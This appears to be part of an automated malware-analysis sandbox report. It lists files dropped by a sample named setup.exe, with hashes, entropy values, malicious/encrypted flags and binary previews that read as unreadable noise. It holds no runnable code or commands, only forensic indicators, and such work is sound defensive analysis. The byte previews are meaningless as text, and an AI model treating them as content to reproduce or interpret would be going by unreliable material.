              SHA-512:05202611C40F133DA549016F7BD73789A67C69ABDBE796973A949C7E9C9AB3711CA856469F2632DD72DC3B188FBFFBADAAF42F9CCB338A8B4F6D3C5B55B2AB7F
              Malicious:false
              Preview:EBFGOO......AG..G......y..D.......~X..o.........ut{m}1.....A...W.....5...S..5t.LL$..C...N.V..K..........:.+.%.*.X]...\.O'.Xj3O4..2#%..s~y..G..>...M#..Y...w&}.+Z..%......'WG&..1E..&].!._.4.......T........2y.m{4.........0.dag.V^2P.?..`.<...U..g......n...N.p....8........BV..`.d.!1..b..~V.]{1.\K...`..Sk........3.....'[...?.`../....=Q.u1..,.=.K...5.Hw..3....u/....z...Z..j..z..9.QpB...P.......LS...j......\).@......s.oq......F......PI.3z.,...]`j.?.Y..E.tY^qn..^..k.o..:...>./7+.7M.HF...DW......p"..Q.~?N9..j.:\JT.k.`....]*L.F9...-.g..k^.........zB...n{@8.\.zw..$..HL.v..n,...J2Z..............y..Q.o..0.X....XA...BS...(z..a:.5....S[.7.>e.[Y..^....4v..UA..q..A:..O.Q..^?....`../..MH.p.....HSCi.@.L.?..5`...S.p..R....r-j.)..-.+C...B.....5YE..T.I.Y...v...z......B.g...La.(...O.+.E....h...j.|.W.}..8..t..5c!...fGw.H.'..,Y..3...w.0ac.hn4.F..R...$.......6}Y...R....9.(.*...R2T..j..O...y.ni.;\..PLu.^vm.Qn.%:Ce.wc..SH.{f.....z....g.N..4\.xD^..-..u..4w.A...
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):65536
              Entropy (8bit):2.8950016491345485
              Encrypted:false
              SSDEEP:384:+8Pc7w9bPiHKPPuo4dNCn9xL5Q0Pzh84WxE80f:+8iA6qPPutNCn99Rrh
              MD5:841052D4EB1330FA98229CD96EE84218
              SHA1:95E58E32F7885D721F0D14D271CFD2A32E37CCD3
              SHA-256:D62C0CF7B34658FECB35A085364DC1A5B0A7794E071290B1C346FCFADCBD0EFE
              SHA-512:EC8263C0B18C3B4B9E1CEDE142C26395E8F1B5471BBEEFD114F331239995E8BD904B5651CA648534F287BF1C5CAB0AE2556E819240D1E24340372B9B57FEC78C
              Malicious:false
              Preview:EBFGO....C....Z..cI`=..2t0....>.......\}@x...6.u<.WW..(;..h....Tf.tT..yr$.l>.Z...S..|.F.........?ed..o.r....:]..WH2.7.t.![.i....P.2.E..@bE..C.J.u...?0}m.Zg.(...}.y.=L.<X.H....pu.+@..a.Q....]..YY.....X.'.`7.....h..e....5..".Q........j.].. .:.... $..{;@(.._.u..;b...0.B...B.T.{|.U.w...qh..wY.......5J,/.|r........9...#...=.*+..$9*.O..@..0...3X...Hx........x...w.R._..I.........X...g.......).}=..+...2....O.zb.O.4....!.......X...{.3..HD.Z..7[)y.W.7je.....8'..x..H..z.9.d.Ys....n...A2.V.....*.....c..8..Y.m3.@].j..(.A=.......*z..../!..u...-)Na.F.b=..L...nr,...c......;.....5L....'./..Y....d..uio...L#o..e;..hx.............w.......A.r5...C?..,.&awD.e....xtS.7.Q...v.0u..Y.a)....J....t.|.y..........$.=.V....M.7;..t/Q.D..........A.......o...7>.8.....bC.d..jW..j..T-g!.A.r^......Z?....[.eQ..:.x..kj.?Vv.3".(......G/g.8...^..D..Jt.M.C.&|81Je...]wMD...Zl.!n.>.5.Y..F....Ow.......X..!-1#).............e..!a.....el.y.p...pwt.l.".@1.././.y.4..a.Y..nf.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):65536
              Entropy (8bit):1.0117314684050058
              Encrypted:false
              SSDEEP:96:ueuq2CBqKFqcrXFQrwYzIEQISpdRYA0xfiugltZyH:qq2CBqKDrX8tsrISB/0xfiNk
              MD5:E2D31A024EBDF02EA35D0C5086FFD3EC
              SHA1:09DD27C854D977B1C9FB30729A3B0C413C812686
              SHA-256:CD93B834E64BA11BDF864A1A8B300F74EDACC3CA11F6BAE08B29953640081D23
              SHA-512:7B32D8CE3BABF9CA1C07EAFDCF281EA7D486CA7024C02BB52BB75A839B9D74137D5053EA9B5187F725EE3D826D4A3925B224B9002A3030417310A43E4A79FA2B
              Malicious:false
              Preview:EBFGO.b>.[...A........I...b.....,_-Zbn....'..*.^RrB..i.i.|.{.FU.cL...k..*....w2....<......`..sQ.;.QS.p..kE.f.*7....+.....m.C.y....._..z8.$o..R....YI...B.&.Nu..Q[.~,.......Y.d........ ?N.x....t...r..."...>w....5Z.-g[.);Vj...^.*..Q.y....w+D..c....{:.'n..6.9 K..@..@.b..d...../.....Kz..d.i...dB-.u...+..+..1..../...E..1.{J)*(3.!...QX.".zw.8.G..@........<l7.z(....7.x......vo-.rS.G\+yI"51h.~.dH. s.@.B../..p.._6.8..{b...Dq.{......6.O.X../.l.2...Kt.,.H.cD..#.F.:.i.\.....C.@.s......".F..........>UV.K...x\....-....7.Q.*.}..fMB.P.}/.$'.J.>.%A....y.].B..|......\..4.i....-.O....6..|./...D....ZMEo%......_.{p..CW.x..?.FQ.f..H....{.....-..L.$....v._C..<S.L..t ......-GP..h..t[8V.;=M...42.'....T5.# .H0s.............K..Zo..6..../Vi:..|T...e.h.L..j..s..6s/L.da...(.P$.....0@H.i4..O5&.....*\.m.E..1........9...|.'CI.......M...mv...M....X..6...'..~......<....2..>......n..iz...k..`.6.u}..isQ7q.1F`..[A.....7.l..... .H..."....R..q.N...w.;.5...$,@.j_!l...+n..4...o.T7;<.4uj.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):65536
              Entropy (8bit):0.20663807144540586
              Encrypted:false
              SSDEEP:24:8PNNCe8NwwRSCVY/YAksWXLsbgsaH1DeLbz:8PCXlS1ksq9sesvz
              MD5:EB478F2034B11128CB45213E45B0CD12
              SHA1:A3C5749EC12A24E2996D6997C3689A5CBD0738FE
              SHA-256:7B1F858C1E9BCCE08DF38B7385FD7EA74801447B2133BB1B27B86A1DED687654
              SHA-512:D4B8461EF354808AF2855F22BE8B275B211E30E906F8D9C2868C74F6FB7099D2A5BA32046729C22C532B1C056FEF6D2A6457DF66793EC24A36124CB440B33E33
              Malicious:false
              Preview:EBFGO|.w.e....~..P.....r.e&...i...P.._...JN.3\Tm...._Z.m.jy.s.%#F.z0...5Df...Nkq...e0.C..F~C.....h:.b.)u5.z..yhs..(.Vz........b...|Z..C.C X..... |].}t(y.Q...?.....$.HHC...[......o.w.`...E..<.MSN.P..oB.=z.l:.........].n.,....'..s....s....g@.0..\..WtQ...d.`........I.>.\.....H....Dw........d-<.>.>....N%.`.XW..,x.WYO.AY..myB&"..7..%.e...u(G.'9k...>k)..A.m.._..{E...'..a... A..Jh......L.56.}..\...s.......?.*.m...>.....f....f.........|.FV.$...J....d..i....]...DV...m&..l...Y..48..T..L....4.I.....d..M(Q...'H3C.@...Y.V.h.%.......#.2w..*C5.p.2...........L......`...'ZV...l.^..>\.,...m.q.J..y.I...R..'...X...Qgy.:.`.I.@y.R..G...#.....u.....0T.p.N.s[M..w......i..R.:...w.E.I.%.....U.....9....E...J~.5m.5!h8.~|...M...t..~pGn..l...l.0.._..(&.../............7..#.........$aVrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}........................................................................................................................
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):65536
              Entropy (8bit):4.690079801096324
              Encrypted:false
              SSDEEP:768:xO+BubyPhXUaON47aiHt8P6zu0fFKHhVYa:oeubbNma2iqu0fw
              MD5:5F364416E1199A7312B1003A3B78E59A
              SHA1:06D1EA684F260951AF7FD433DB656E5FCF73C226
              SHA-256:02622295DAB10E8C360426578E4F52693967C8984A469E8A343F536C1CEE5A5A
              SHA-512:9ACAFAB200CB9BE9C7DB46F9E7D902B59E046CDFEE3E18140E8CA723B4C434809676D2CDAED6FB2704492A6EC7C5A069605D6C43BE3A6CC1624FD8FB00A18D90
              Malicious:false
              Preview:EBFGO0.5.Pt..4...."ra6.eA....~O.oq.....rg.,....Ts.....1...{n8=.bj..N..w.?.G.q..D...I*..q................C....^M~.l.=a.`cD..........QZ+.ZM.e...`....I-}....C.^.TN.R.W?I.k.Y.M..v.Ig|).`C5M......K.9..5f..jM.:.Uq.....|......"."+..8`_..?"..........8........w,x...G...%....(.{v.u!...x..<.......a...ct...I......:.bF..S..D..Fa.aj3..u.WF.}..W....I...0..Q..Z#..q.......+..?.8....N._DD.CA.\M...g. U..$.o.lx..E.......p.......v.8@3oW.u.T...{.%o...H=..=b!W....`.'...S..h.&..DC..Q......8.>l.Z]..d....B.p&j....0............{5)<p....Ey....".....aasHh#..O..PJYf.7j.p..l..*..x.n.c./U.....^...L..9...tC.....}..........^...9F...o.)f..x.^Q...g!..fuA-!n.g......<Sww.B.a,]V.....F.+Oj...L... ..R.=@.....f7Ij...FP(...*.......H.i.!L.--...<7..,z....l.X.+.-.A..G...%k.Y...Z..{.B..z9.....+..+.g.q...Q.J...E.r......2..N....C..T.u.In.B.]sg.Q\+....Q@Q.W....>..U.7.+|B.B;......ZZ^.....z.>.z.[.....{...HW.....*k....g..hbn...i......../A....,U..o..T..Y..a....]...!.W.j.[.4......]!*.C.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):65536
              Entropy (8bit):0.30643253591840774
              Encrypted:false
              SSDEEP:24:lu+U//FYyJt2+UyszD0GqWnkEYNrwmgfZOUZCgj1ULnoDDFXykPbz:E+U//FVHwdkEYNrwmgfZOOCNj2DFiSz
              MD5:4159D89FE5EEC1C26E240577979F779D
              SHA1:BF314525B6B78DDFB98D1922C4C34309881DC102
              SHA-256:AABC5E3CAD471F347B8A3815525BC5FFE2AC280E5A02DE48BADDCBE5EFA57305
              SHA-512:E22798597D33DA32DF0A0088CB86D9CA4478B0FCB9D4280E86A79D56C8A698C1AFF898E596705B74570956A16CCF2DBD675B2328597ED7495617D9E14BDA0E97
              Malicious:false
              Preview:EBFGO.F..EW...<....h....rV.|I....1.p.......Q..A..e...F.-....U..a-.....@M.;..n...j.DqX...&.y.hE6...(...t%.O.G.....,..q...$.J.....%k3..)....d<..v...].h...!...+~...P...'..l......0}.+!..u..=N...+..C..W...TG......;w...nd$d....PP........"B<0.z.H.b^...'....J.a......g.[..y.kiN\Z..........K.......b........v.j.. e.;.....>..I.$....~>|....;U....m.P........`..ctb.A`..]..o.O2.'.S....$!M..".h....DT;....&.O..t......0....l.D.......@.o.J.9..k...KL]z.Ihrl..8.2tZw.r.a.....;..)dNkO..A..!=.DQ........g|.+t.G...su..E.....vw$..K...........[...@z..v.N.....) 4..4....&..$....%...z...g.c.k$3A...0.&\_t>J......!=.j12u..J..v.`..z!_x...m....m~..[...."........:....J.a.*......2...sb.?\.m..d2%`...<..B..W,.../....j....Z...o...l.(.4...[...\3!.~...th.d...<.'.".;=~.U/i.u..]....e..yO....2..4..V..D..q9.e.<=%.y.[Xl:...h. ..bXLl.Z..jO/Z....x......}...!..j.SF*...i..1?..Nj..(gH..5.U.6bO..S.v&Z..(l....9.\....p.<.&..}sC....w..&..D.U.Qs.H.I....[.g-..V3.......cg?F..:.J.p.<......\....
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):131072
              Entropy (8bit):7.941441546443875
              Encrypted:false
              SSDEEP:3072:Avsc9kBVGfYrfvnrdmGGNgPP1bdfNyItKt/UL9FC5cmaX:Av59IaYTQp6hjyItKt8L9o5dG
              MD5:D7D32630746EE7FF77660E1A1B31B64B
              SHA1:FBF743AE38E9DAE2C51B6693B4BB9E23649CCCFA
              SHA-256:EFB6F2F0F4D1C98D2361E960D87B056706E19143BBBB3BC7A88AEE488204DCF9
              SHA-512:13C70B209A2D0C87727B463EB6EF67D64A7107C6CE05A61464232C96931F2E127455A4B9FF1C466E9829F99F79AF62E224AF0538233D9228632F7479CEF5B1F4
              Malicious:false
              Preview:1.0./!H..u?|......]...|/.7...i...g..w.u.n.....*.:.4..........[................}......<.sK.j..%..D..8.cP..X....l...m.z.q......M...C...T....nA....w..q..5....0+.}. 9.)p....ab..46T.X\..R....G.W.ypy......3.....s._.".#.6NJ2...D.."k.Q...H.....~....t...h=.v..b.V..@9H..KF.G.s...O*`....<.~e0...........Q......./....c:s...@K[..O....@.&~q/I..f..,....E.Es..kk.....(....y.g^......4.?..U.$...P..3...'N$a....OS........K.y..Y....#.s.*....5`P.(15...q#..e..>...[`.&..;....8.Q.T.Fo........jmK.../.".:$.!..i....(.9K.....a9|.wM......g.E8i($..).......p....@..5....}....fS.......Y..[...$..L...[H..~3Z< %z...c...\....dM.4G..r.D.v...t.MD.y.....u"U.{...o....i...H...*....R.....7f0..Q........oz7.aS.z^.-.'X.r.J$....i...eS<..C.........b.L.^.....w...%.P.].k....HP.....^....F...1.tn.3..B..}.....to.. .ykD5P .T..g........5....h....n{"u........1..{..e....:.`.Q..j..s...6.?.:.X<}.....T.~....\......?..i.....^..%:..M%.h.M"a).k.b...y.3{.[.D.I.9-.z8..`.r{"zl.....Ak..
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):262144
              Entropy (8bit):6.804953161926891
              Encrypted:false
              SSDEEP:3072:cv6rbLHRXhhaEWdFFlMKK/v4C8VM9dIpoNndDLJe1/NrRm58w:fLH1hhI/Ml4jVSdIpoBDeb
              MD5:523BF78AA24AF1B589780B723ED22EE9
              SHA1:91E4FDAF88B398E251C1B4C7135B203D075F1A95
              SHA-256:7DD885DF18EAA6F0AE9C46B30C51E0A5AFD51D5078BE8A15F0E2E2492089ECFD
              SHA-512:35FFC17164EE995CF07BBF07B4D07D016385FD865954ACA4645F53AAD3F903EC1C01326B88C50F4792940572F41CBD95F2758DFC55D68CC6138E7C9F9599D249
              Malicious:false
              Preview:1.0./.1/..gq.........M.....'.F=..>t_...H.my...q'.Y:..(.g..g.....gK!.......".3....|......a.!q6./.8.9..w'.gT..}hdK.>....Y...U..x.%N.G..EB...0.s7.xw..$S....Si[..E...!G.u..'.j.......\2../....+..u....C...Y.......,....W?..E....Ha.?"....C......../T.X.?...-.<..S.H.0..q....A...ag..3.........T.MwpJ....t......f..:..E.....%P0..p...........\=....o.Nz}f.v.....'.N..9.....X.9...}.(8.D..)..#.w.(.....,)8Hv....f.S.8.a.....4......@.c......~lS.V.(.x7....j.M.g.PW...$/I......x+?.......w..D...&N..N..N...A.4.....kkU....Rx?.......X-.(6q.g...c..w.....,....,..R.(B.....uiG...../L..... s,...I..{P......`~..vb........5!..)../....d...*..%v.....g...,.....'....=..~..H..Y...'vA.<P..p..Pe%.."....{...X`...g..S.d.|.4....'?...'.W..O....0...[.U#.A....q.....^h...-......N.}.....WW.....7g.W.._...7QN.xF..~.#..[w..M.%-.r.*~.y.J.:!.(...1..6..........n.`.F..:.[.$.:-y......^e.+d.7s.W.......[....)A.O.....m.*....%;....i..j..}...7L....,T..A[-.bi....7.W*........8`.$b.`..,0.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):30274
              Entropy (8bit):7.994378583270789
              Encrypted:true
              SSDEEP:384:dPCCsmCbnR/abj0ZOGw2sbfn8giSadfHJoOObK/gTgCQsMzw97uu0prYogQmNowO:dimCbLZC2sSdiOObR0CkyuZxXmqv+iVT
              MD5:2BEBD333C94586F957E7502421C1519F
              SHA1:D4550D38CCF5DD803D6581FFBC349636529EBD87
              SHA-256:CFB64FAC408A16BD5566B735B45437857CDC30D8B8B9FCEBE9E5FA5391D5719A
              SHA-512:1469192DA60378145EDC5C500C22C94E9D1369798E261B37FC6399A3110E83E8D4210D03F6358223DE2509CC39C809E3A3A0E6CEFA77EC6E14CF91734B82CE29
              Malicious:true
              Preview:1.0./`6...;.*Z...Fz.....k.p.3.. .)....9.....R...zX"*I.......?...H...{.......j..5..H.i...%...YO.y.8.T,....u..O..k}..@d_....QN...F...*....P.k.M]$.i..U.H ...6r..#..y.H.}R+.X_...w&...`O..<#.....=..{...6.*...WFL.....)2.E....~.0..O6....xz..L..}C..I.......j..)[q;..bL...~.....",*..K<.9.....o.@z...X..3.Db.P.c.?.j.....h.=..x.N;....,#.=.....JE.|T.|...w.eD..6...I...._%.V(.+.|/.]k..E..k.]..l....*...j...AE.@...O.-.....r1j+.:.\$.'g.BS.u....O.]lc#..)RHl[..K.s..EQ.Q......[...S.......G..3..=..9x...S..R..Us#A.....\0.......y..Fb....Y.>8..............7..Lj.T.X.&..P.v......c.|......5..|S...'Nt.N......u../......f0.8....`.......(...Z.......!`....y..b.|..a......9..$."...A.....[..M8.f.............Y....j.Q.E.q`w.5....{x...W..~...T>u>".!.q*{A....6..$...M...C..n.)x.Gg-....b....t.0.....r....cK<0m......[1..........[/y.:tnf....j..2.Z.....d.G.$...]0'...........;ep..,+..#....Xz......p.b<....B.Kv.c....S.T....R.`.0_..|..4.._i....v#..,.3...w$.|..(#.+p`d4......=..q.|Z.^.c.W.k
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):65536
              Entropy (8bit):4.6725184161187485
              Encrypted:false
              SSDEEP:768:PUv+fvx4jXctL5nmZ8eQ3zAxHy8AzEux5pjPz2nr5:PUvhcR5nmuekzOS88x5pjPz2nr
              MD5:45487C151BA7A2B95E7A200E2775B8CA
              SHA1:5E8E0EF7CBD3FBE60A39D09842C64208B40AFD56
              SHA-256:5D5508E4EB251236247FBBB32967203D15E5921A3D4B9D20798F48489B42D768
              SHA-512:113238C1EEEB527145821036AAEB4220F4BF3BC7EB03B59CDACCEE5C110CC57FFC598CABE1B6DE87DD54385808E8D5D43081CA73BA4B7D4D9A85E9024A66F6DE
              Malicious:false
              Preview:1.0./..oD.J......{.W....g.GS.{>..[>..._*...z<._..2../.....{..3.A..._/^..L.....\8v>I>...@y'.\d.).K.k%.a.F9.c.....Z....,.......<+.c6...7s.`KyT..V&......h.*e....G...#...~....(P..Tx..O.'...=..n.. .r..d.PX(....A..y.)l....@..ym.*o....l.]m*...s1....q3-.U....j.~.1.........d.&...\#.M*.+.....D.(E...C*g.=...?.....)(.....}..V/K..#..@.......dr....1:.S.....T.P...c..)3.<.....5w.+..$...l|...,.[.$...dH.2.{....tb-.4]Sih..7..s4@. ...;P..cri=.;...e....6C.....A.p!"..S..w.v.j...rGI:......A.-O...4....*/.E.A.N..........~zw.@.....g..L$..,..........J.....toO...#...N..+..K..t5P...o....0.}...\k.C..q..CI.../..w:?.b..5M8?...$,u]..Ko..&...4...FhC...h.t..),^2L.....iX/....=:...]O.V.1d.....w..~g..YN......u.H..l.T'+;-;T....E...G...u...D....r.slO.I...$..(..fw.oM..6B..1...s.....v..Z&t'.....?.k.....tCx..gB.tn.P_..XR..Y....I,.9..7.q|8....^..........O|h....GO.. ....g..h.\_[.o?o.%.G.c.Q..w...s..H9y.5@.v..n`....d.L.....!.+....b.P.....T.(...l.!...Q<...@..n7B99..M......_..a~,W0
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):65536
              Entropy (8bit):2.3046085970144765
              Encrypted:false
              SSDEEP:192:745kTphp6xn9J8YsrxQ3xrJcRIzmuaGKLliaJSooFtC1RZgfWAS5/Xtj65vQtc5:85Qhp6xjb7cU0GOMaTZgf7S5/Xk1QW
              MD5:0BBA20A816E48D27BBC01484CF66084D
              SHA1:C0095DC8B0327C9A1CBFD3AD24A5ECD2710CC603
              SHA-256:D1A7ADBECF0CD0D341744D418329CF9F1A7C4BA50AE8C21870A0C6145D53E8B2
              SHA-512:5259A7E864C4257C9240157B34885282838DA46B459B5C30C90E251ADCFFDF7F4DD19F712CCF5C8881D58C99A6AAB10C51E77ED421DA2358D74EE69E657BD9EA
              Malicious:false
              Preview:1.0./.\Z...|=wC.."[ V..m...`V...W.&..!.W...bz.Wk..7.V*.......E.&.E.k....{%.D>.....b.*'..nL...;r@.4..6..N.O/j.R..e..P...z....T.E..N]M.R.^D]...../.cyP<...KM....Z..F.....M%....\..w.r."r&.r... W6...I?.l...*..A....D...rc.adc.i...)?N.g....uX....J2.........[..[...3.%f.....6..ouJR..A.+.Eq...-..#......:t}e....p[B.6,.:..u...R..b.rH..V..S....\...l...9.w...........W.4....k..>.*..H.....FaN.NQ..*..M.'.......hj@t...{>..._R.U.7.X.....IX....P.st.....|(.o.Wq..s/.o..:.E/..|Z..0^.t..EK.]......7Tw./......".r..z.Z.^........L.D.){.EF/)....W..U..>\[;..nC..Vi.u....2P.3.N..8..!.G.,..........#k.o..N.p.|Q.....s.`..Ov.."..w.....P^.JM..Y..]6.}...T.[K.I^..r.i[.:.../@Mm.8.....f.....=.o@`..b.}@._k:..5.....;k1/.2X..@..l.hd,...EatwJ...6h.[.*. nj.?:0......3R$.X.}....<.w.N.........`. .....2.......6.7...ik..fTf.0....0.. ..$...i..Tc.O..2...eG......M).M.C..b..T..&6%..........!x..9B.#.Us..l.6..\..k.8....&.....xD......5.Y...,9\Dy...?Z...K..{..$'...^.....OH.z...%...ZN.c..D.3
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):65536
              Entropy (8bit):1.467060227722507
              Encrypted:false
              SSDEEP:192:c7XjUZbUAId86wRK9T1XaVvX/MyZOKEBGnHFb6HfYoB6sOzI15:c7Alcd860Q1Xa5vMqEW6HeG
              MD5:9553EFD9DBBB730A51E744D24EA8C3C7
              SHA1:8310990C45C23C7AFEFE70B1568608A357AEC70B
              SHA-256:CC9986E34B55BA61579AE8A2A551BB622A883F7C99021E9198FE0AAAE92E31E8
              SHA-512:24E6301135361BAB278058E9534B2BD27A31CE25DF161E2D9A01ADDDACDCEF372EA999EE4C3FC96211C4DA2DB7592DAC408B019691409D1E691F5FB256C39DF4
              Malicious:false
              Preview:1.0./#.<pO]TN.Bg....S,.W...0h{(..hx.k..f....2../zv...=1.).p...(.o...|.V......;..R..N...%<..........z....!.....l.~..g.......J...N......`.x.-g..q.y.....e...{iw.....|(x.ZL.hN..Iu8B. ....(.1..b.V@..;c.D.d.=w..,.V].::..........=^..@f..E0ce..P.......qg..jp..dL.-...}Mo..^..<...W.'.w.V1....$ZY.$.e..2>...N.y.].@.L^...$~..G...,.?<Vl.g f.. .........4Y.\.nm.iG.18..' .Fv2.2j.....q<.K.S......:".B,9.."...G..".2.._x..}..}...W...^"..?..z.!@..,p..C.tV?+:..|.{...M..\kCZ....r.."..`....}T..:Cr?$......t..I&.W..Y1`.2...!#x.>.hYm....vI......DJ.0..!.....?.q.8-\.o...Kv.....o.j.b.2.ai.N.O9U6iw,.'.t.j!.....pe.OS....0.......&........H..XB.4......t.g.c.u.?..n.j...V...R...@././..MZ....#.,M....j!*.`W)....0.5_.P'.........B]|"e}......^/.........CH.4p.....1.E.L~>..b.?2.4..+..FY.:.T.......q..>...O..-.c...@.w....o.L.O......#..Q0....s.J..\L..A.&....7...I.'.............R22u.......].B.,.-..?..{.i..*(..@....I...S.1....*J....@H~f.T...B?.....V.;..j..L..dr........x........T./...8..b.i.j
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):65536
              Entropy (8bit):0.9682876476630352
              Encrypted:false
              SSDEEP:96:wnta9SrgFGhCeNtwcA3orbKAlTsdQ4GXpRsgZiF14PyPf5cR3:wnt5geN+kyAeuVpRbQ75A
              MD5:5120AEA8CDD9EF5A2FA2557E4628822F
              SHA1:DC0F33DBD68678BE371CDDA1D002452EEF7C9321
              SHA-256:76CEE35D26200A5256E875CA4B4EBA9823BB3F1078CD0E6A25FAD6E2F76389E2
              SHA-512:11D73A2188D4AF476E803D7435F8EB5010CB0AFA43F73DA4F662E7F67E9FEFA2451000156501554506D7BBDA36A9470501986FC16B99793C7E796CA16B95DD8B
              Malicious:false
              Preview:EBFGO4..F....z....8I..$.`...3m;........D.d..q3..7J?/A:1.C...........X...l..R.&d.{aq..0+.o...U.Bn~.2Y).....kb.tC.+t./h.1...:v-zF/.@W_QV=U.6...?.....[.J..KY.S.r`......?......../.n..'.Lo....y.Q..=1..csA......w.\..m.:...\6{.:.a...0.....v.3....x.C5..Qg..r8..y.A..L..y.z...n.Y}......E.~-...x.f.......5r..'..3...=..n'Rz..:k...W.o...@1..RwY....T ....pT...?.o..wT.U.m`..|6....>5......sJ..)..'..V.\.......o\J._.-P..j...z.z.A..7(.7.~ %..6(.j........a.Z..f....c..Ov..gu....j.c..'9.,k....d.7..E..Aa...{.3BX...i.d..2....{.1..y!....52...Z..CjIMG..o{...?|..n^.\b`..|U.....j8F.Ka8P.T....@....<N..7CR.......i..8.&..0c.....Cx..M..W...;K.pI.:..C.5....\..B.,.....9W$1.?...3,sJ...qH.T(e,...,!.mf$...b.....8.7.0....weB.N.t.x..2..............J>s.0.j-px}..~|...nV3D....[.BfJ$......s.....Knw.Rj.......`H....A..U..+...|@<.I../i....,[.L#E.6L/.[".YS...;.5g5.]Rg.93S...];..;.]lR~_.\...%....)o.]...W.4%...4...ek>o..15...-.."..}. .....Z.....N.........6...^^...2.p..h;.~......A.H
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):65536
              Entropy (8bit):1.5618917801167194
              Encrypted:false
              SSDEEP:192:oKjx8HURz7QmnCjXqztStkA2A+VvbT4Vi1RAxQAqUN:/jAURz7QmnCrmDAm+i7KQEN
              MD5:C534DEA38922CFEE6FC795F31BAB777A
              SHA1:1E80EC6ACA6BDEABCD59FEED30EBE304BAA3F1FC
              SHA-256:18587CA3CA9C6B22E1C7A80E84BAEEFFA1F8D4D7024C3820AA9E4C1D3E595C7B
              SHA-512:739213CC8B6068F94CD3F4406E0E0ED8373C917297480057F833E84D6B0B4160EAE7DD874208DE67E51FE89FDABE000C2CEC9CC2030819EA63D391CAA0D94C0E
              Malicious:false
              Preview:EBFGO...........^\.E.......E..c_...Jb..z.(.6#%........P...0..x.#6....].Mo&..:..c./..J.L.'D....!0FW.z"T.f.OQ..^...K.d'_..z....e........w...p!.X)l.z.;......e.w&jX0.4......L.mv5"..2..<.....\..FU.@.L_k(...X}..r.I!...*.....v).....+fW%..`C~I.`M-&..Z..,~.v......0..2..x`.c.......}H.u\V^..F..-....|L...8...wH.}...g;.C.'~.......R..'....c....$.F]6..a.H Fj../I..B....G...M.P$.t.A2.S7.`.LU.A.b...[....@h.D...];.....&.>..&...Z....1...p[.&.?F...unp..>B.!\U.JJ.x....N.b.,..j.}9.....p/..E./7U..z....;.)<_...G.k...p.._G.,z.Bu.)/l...-.?......./.a.J..&..|..l&....q.vAk.W....!..@.w/.v.M.q..{.G........;.'s...[.......S}..m..k).q.N....Uu...C.#..[...KW..p....c. ..=.H.O....n%.+u=....@.....0...@.[x........L...h.....0..w.dH.w.*.t....U:..\..yZ...7.1d..@.G.0E..#..X..Cu..e...,..6..7.w_.....H...~......l..7.t?(..t <.h.`..5..2eKD..#._b]p0.......cz<.5W.cg...h..$2.d..b.....*..\v...*.".<.u[l.Bjp....GcM..<..l6....5..."..(..|x....bJ.W.$t.{.....^7k...Y.RDG.23. ..d......L.........
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):65536
              Entropy (8bit):0.8649484383825096
              Encrypted:false
              SSDEEP:96:WIIkCAr9doeos0hhuBxtOUWZOAfSe4Ulrucbmh97K:jI2r9dgiZWRTlxbmh97
              MD5:C82B77F552C2F3AF6ED382949CB651B5
              SHA1:F2FB141296B82C84EA31F283B8FDCC1398D2EB75
              SHA-256:8A620E5FB47C0F1EE31D6D9AE730BB98EA6A08E6E7C8AAD4BC445B83EC3F6F6F
              SHA-512:F01DF2AA2A1AD4E4107CEF4234747411F5B0B48C26E96C3E0FDD9C68AA5143F2E83B807A564BF7C4955E76564E13C13CFF9F014FB9C03C399032C47A172B7FB1
              Malicious:false
              Preview:EBFGO...%....4..j[bH...SO........-e.O..h<\.Pl.*p<.C............%..f.+.......@..x.:z;:n*KD...8I%.`s....9....<...("Lx^.aXY3...=W..G...7..e2...~.U.p.p(..!K...kA......0.$..q..W...l.*...Ha..7-.i-...%t1..^....|.v.....n.U.~.'.....&.!B.0....$J..|V..d...q`..V7)N.k8.s..-.$..Cel..!.R..=.Q}.?...........H.{...'+@....$.1..+....#.J.X..%z...vvNj1&.b..b.E..`.Y.p.en...^.:.....c...E%.e..$7...e.?.].tOq...q..X....[.Z..C..t........x.=.....\....&....E.s.|7...l....g.I3..`...Z....w.+.b.s,K.(4....;......\...8.5.L.."......k)....q/.....f3........"YL[r...|.K.pf....*.\.u.<../`.|.7Qc7....zD..R.j....a../x..Za.r.....v,.}....:...j...|$.....c..2.d..E/.@..Q.UTgpH.L.....o.."..-.MDZO......@.B)..N .H+.t..Q.T..q2..o..W.s...5.). ..P..0.[..>X&g(?*.>q`...8td.y.-.s.].O.{n6.{G..O).2.Q...C\..w..)i&..9.....=.H ....,..\...{..(..fw...b.[..'re..M@...bm..x..F..'.8.;...K..d.t%.P..{..F.:~..*..|..._..9.>...(n.wS.%V..]M....X...E[v.....`...*...8.M..+U.H"7,..ZL.....Lu._.....q1.p...
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):65536
              Entropy (8bit):0.20612588482664615
              Encrypted:false
              SSDEEP:12:icTbynTvuJxMRS775LRs+VxpZVbm8bJrgviYz+05MEmXP8Pzz8EXSfidOF70EoPa:ihTvuTMRc7VzHd+Tcb0WJ7U31MZrjbz
              MD5:08C559A2E343F964F16F1C2B8C6CB1F7
              SHA1:CE7257E31821D42ADF025E0DEB85DD7527D10AAE
              SHA-256:9D23696E194088EEE15D8F8875E291C72F98ED7BEA3711681ACD66A3D7BA62BB
